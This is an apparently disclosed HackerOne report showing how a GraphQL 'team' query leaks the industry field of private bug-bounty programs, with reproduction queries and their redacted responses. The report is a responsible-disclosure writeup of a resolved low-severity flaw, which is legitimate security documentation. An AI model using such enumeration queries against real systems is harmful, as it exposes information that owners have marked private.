Team object in GraphQL disclosed of private programs via the industry

Disclosed: 2019-11-23 09:19:24 By haxta4ok00 To security
Low
Vulnerability Details
**Summary:** Disclosure of private programs across the industry If the program is private, it will show industriy ### Steps To Reproduce {"query": "query {team(handle:\\"█████████\\"){_id,industry}}"} `{"data":{"team":{"_id":"█████████","industry":"Computer Hardware \u0026 Peripherals"}}}` {"query": "query {team(handle:\\"█████████\\"){_id,industry}}"} `{"data":{"team":{"_id":"████████","industry":"Computer Software"}}}` {"query": "query {team(handle:\\"███\\"){_id,industry}}"} `{"data":{"team":{"_id":"████","industry":null}}}` ## Impact Disclosure of private programs
Actions
View on HackerOne
Report Stats
  • Report ID: 707406
  • State: Closed
  • Substate: resolved
  • Upvotes: 68
Share this report